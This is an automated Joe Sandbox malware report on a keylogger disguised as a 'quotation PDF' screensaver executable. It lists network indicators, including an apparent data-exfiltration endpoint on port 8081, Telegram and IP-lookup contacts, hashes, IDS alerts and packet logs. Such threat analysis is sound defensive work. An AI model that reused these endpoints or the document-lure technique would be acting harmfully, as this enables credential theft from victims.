http://r10.i.lencr.org/0	MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
185.123.204.162	investms.vadavo.cloud	Spain	5505	VADAVOES	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	filetransfer.io	European Union	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483407
Start date and time:	2024-07-27 11:00:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe renamed because original name is a hash value
Original Sample Name:	QUOTATION_JULQTRA071244PDF.scr.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@13/0@6/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 58% Number of executed functions: 118 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 199.232.210.172, 52.165.164.15, 192.229.221.95, 20.166.126.56
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MSBuild.exe, PID 8188 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:01:08	API Interceptor	2562x Sleep call for process: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe modified
05:02:11	API Interceptor	19735x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	kHeNppYRgN.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	5RQ24SOW EPIRB_TOTAL Marine Services Ltd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	DHL_497104908518.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Tystnendes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	25bbed456281ea6f37cb6b295ebd0d1764156e797b4f15e0dc1bbcd7342086a9_payload.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	engine.ps1	Get hash	malicious	Unknown	Browse
	invoker.ps1	Get hash	malicious	Unknown	Browse
	tgmes.ps1	Get hash	malicious	Unknown	Browse
	x.ps1	Get hash	malicious	Unknown	Browse
	invoker.ps1	Get hash	malicious	Unknown	Browse
	locker.ps1	Get hash	malicious	TrojanRansom	Browse
	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VJV2AjJ7Na.exe	Get hash	malicious	XWorm	Browse
	zx.ps1	Get hash	malicious	Unknown	Browse
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
185.123.204.162	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	www.exporationgenius.sbs/x06k/
	o4iytkmhqh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	660256cm.nyashka.top/javascriptsecurelowWindows.php
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/dGa
	DHL Shipment Notification 490104998009.xls	Get hash	malicious	Remcos	Browse	tny.wtf/
	Purchase Inquiry.xla.xlsx	Get hash	malicious	Remcos	Browse	tny.wtf/
	AWD 490104998518.xls	Get hash	malicious	Remcos	Browse	tny.wtf/sA
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	#U00d6DEME TAVS#U0130YES#U0130.xls	Get hash	malicious	Remcos	Browse	tny.wtf/4Gs
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining2.com/h9fmdW6/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
bg.microsoft.map.fastly.net	invoker.ps1	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://cache.netflix.com.sg3.wuush.us.kg/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://apple.vn377.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://apple.dogwog.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://phhqqzqh7ydp8nreby0mq5yfr8su0h93.ocalam.com:8443/impact?impact=shanmugasundaram	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	http://apple.fnf478.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://apple.eph167.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://www.linktr.ee/debank.notification	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://debankers-xp.com/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
filetransfer.io	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ORDER INQUIRY_QTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
investms.vadavo.cloud	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.123.204.162
api.telegram.org	engine.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	invoker.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	tgmes.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	x.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	invoker.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	locker.ps1	Get hash	malicious	TrojanRansom	Browse	149.154.167.220
	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VJV2AjJ7Na.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	zx.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	engine.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	invoker.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	tgmes.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	x.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	invoker.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	locker.ps1	Get hash	malicious	TrojanRansom	Browse	149.154.167.220
	CCdaw0qbbo.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	http://cache.netflix.com.sg5.wuush.us.kg/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	CBS_applcation_details_072602024_xlsx.js	Get hash	malicious	WSHRAT	Browse	188.114.96.3
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.96.3
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	172.67.37.149
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	https://forms.office.com/r/Rv9K1pC66n	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=	Get hash	malicious	Unknown	Browse	104.16.117.116
UTMEMUS	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	New order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.247.73
VADAVOES	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.123.204.162
	#U0130#U015eLEM #U00d6ZET#U0130_524057699-1034 nolu TICAR_pdf (2).exe	Get hash	malicious	FormBook	Browse	185.123.204.78
	Price and inventory information PO70964311.pdf.exe	Get hash	malicious	FormBook	Browse	185.123.204.78
	Powiadomienie TNT o fakturowaniu elektronicznym -200562850.exe	Get hash	malicious	FormBook	Browse	185.123.204.78
	2401000465 - S24117491500 - Mesin RO, FR. 0473.xlsx.exe	Get hash	malicious	FormBook	Browse	185.123.204.78
	SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	185.123.204.78
	inquiry.exe	Get hash	malicious	FormBook	Browse	185.123.204.78
	purchase order 8MCE15.scr.exe	Get hash	malicious	FormBook	Browse	185.123.204.78
	SecuriteInfo.com.Heur.21813.17790.exe	Get hash	malicious	FormBook	Browse	185.123.204.78
	SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exe	Get hash	malicious	FormBook	Browse	185.123.204.78

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	LisectAVT_2403002B_361.exe	Get hash	malicious	Quasar	Browse	188.114.97.3
	SWIFT.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	engine.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	invoker.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	tgmes.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	x.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 188.114.97.3 188.114.96.3
	invoker.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 188.114.97.3 188.114.96.3

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.431700172176481
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
File size:	580'608 bytes
MD5:	2bbe097169a74646c685a1b024315626
SHA1:	7c7bfa5b44451bc39db388133377bcdce8fd1f65
SHA256:	f595c00fffb17fd458273a49b6378541d83d9a35a8d5fe4b2eaf8ccb9d204802
SHA512:	653949020b7a7a3552dbce7215402a3bd80f41f60462436ed4f0b838e36e89f1fff7f4aafd60fe44670edb827773e4cbe032b59daf69f857a677727c2da2adde
SSDEEP:	6144:AW32sCw7x8RjBWBSRPL6C/KkmPbETepb2e:8s4NBWBSRP+PkmITepT
TLSH:	35C4C50437386326E98DD771E0D18918D2EB6E1E23D9D60D6CC1B66C1B32BBD8F47296
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...4..f.........."...................... ....@...... ....................................`................................

File Icon


Icon Hash:	0e3333b0bbb3b035

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A49534 [Sat Jul 27 06:35:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3e000	0x51c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3bc44	0x3be00	5425afd4ba74b1d0ab0d725ea633e840	False	0.4282889157098121	data	6.192716010424346	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3e000	0x51c00	0x51c00	38fe6c07d8768bcdea785667687a3a03	False	0.0713935875382263	data	2.353085241167225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x3e370	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	0.7601351351351351
RT_ICON	0x3e498	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	0.7155963302752294
RT_ICON	0x3e800	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6826241134751773
RT_ICON	0x3ec68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	0.5389784946236559
RT_ICON	0x3ef50	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	0.470679012345679
RT_ICON	0x3fbf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4378517823639775
RT_ICON	0x40ca0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	0.36402439024390243
RT_ICON	0x41308	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	0.33110687022900764
RT_ICON	0x42fb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.30881742738589213
RT_ICON	0x45558	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2560	0.2924174174174174
RT_ICON	0x45fc0	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 12800	0.26580996884735203
RT_ICON	0x491e8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	0.24244213509683515
RT_ICON	0x4d410	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.014139568600763382
RT_GROUP_ICON	0x8f438	0xbc	data	0.5797872340425532
RT_VERSION	0x8f4f4	0x410	data	0.39326923076923076
RT_MANIFEST	0x8f904	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T11:02:24.769287+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49752	443	192.168.2.4	188.114.97.3
2024-07-27T11:02:22.215117+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49750	443	192.168.2.4	188.114.97.3
2024-07-27T11:02:09.943016+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49740	80	192.168.2.4	132.226.8.169
2024-07-27T11:02:13.045103+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49742	443	192.168.2.4	188.114.97.3
2024-07-27T11:01:56.627341+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49739	20.12.23.50	192.168.2.4
2024-07-27T11:02:14.364849+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49743	80	192.168.2.4	132.226.8.169
2024-07-27T11:01:18.959325+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49733	20.12.23.50	192.168.2.4
2024-07-27T11:02:12.427973+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49740	80	192.168.2.4	132.226.8.169

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:00:55.068078995 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 27, 2024 11:01:04.677659988 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 27, 2024 11:01:09.587579966 CEST	49730	80	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:09.592639923 CEST	80	49730	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:09.592715979 CEST	49730	80	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:09.594172955 CEST	49730	80	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:09.599067926 CEST	80	49730	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:10.268465042 CEST	80	49730	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:10.275284052 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.275367022 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:10.275558949 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.294085026 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.294168949 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:10.318193913 CEST	49730	80	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.772520065 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:10.772613049 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.776287079 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.776338100 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:10.776725054 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:10.818130016 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.837994099 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:10.880597115 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:11.385703087 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:11.385942936 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 27, 2024 11:01:11.386012077 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:11.412549973 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:01:11.426067114 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:11.426089048 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:11.426165104 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:11.426424026 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:11.426438093 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:11.915855885 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:11.915997028 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:11.918299913 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:11.918314934 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:11.918699980 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:11.919897079 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:11.964504004 CEST	443	49732	188.114.97.3	192.168.2.4
